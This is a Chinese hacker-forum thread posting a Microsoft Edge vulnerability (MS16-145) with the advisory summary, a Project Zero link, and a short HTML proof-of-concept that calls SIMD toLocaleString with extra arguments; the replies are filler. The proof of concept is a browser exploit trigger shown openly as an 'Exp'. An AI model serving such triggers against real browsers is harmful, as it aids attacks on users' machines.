90_ 发表于 2016-12-22 15:15:32

(MS16-145)Microsoft Edge远程代码执行漏洞Exploit

执行摘要
此安全更新程序可修复 Microsoft Edge 中的漏洞。
如果用户使用 Microsoft Edge 查看经特殊设计的网页,那么其中最严重的漏洞可能允许远程执行代码。
成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。

https://bugs.chromium.org/p/project-zero/issues/detail?id=961

Exp:
<html><body><script>
    try{
    var v = SIMD.Int32x4(1, 2, 3, 4);
    alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
    }catch(e){
    alert(e.message);

}
</script></body></html>

菜鸟小羽 发表于 2016-12-22 15:28:58

支持,看起来还是可以的

08-wh 发表于 2016-12-22 18:28:43

Jack-5 发表于 2016-12-22 19:38:38

支持中国红客联盟(ihonker.org)

菜鸟小羽 发表于 2016-12-22 19:54:58

支持,看起来还是可以的

54hacker 发表于 2016-12-22 20:10:41

支持,看起来还是可以的

Jack-5 发表于 2016-12-22 20:26:56

ljy07 发表于 2016-12-22 20:54:25

支持,看起来还是可以的

wilist 发表于 2016-12-22 21:26:32

我是来水经验的……

54hacker 发表于 2016-12-22 21:42:40

我是来水经验的……
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: (MS16-145)Microsoft Edge远程代码执行漏洞Exploit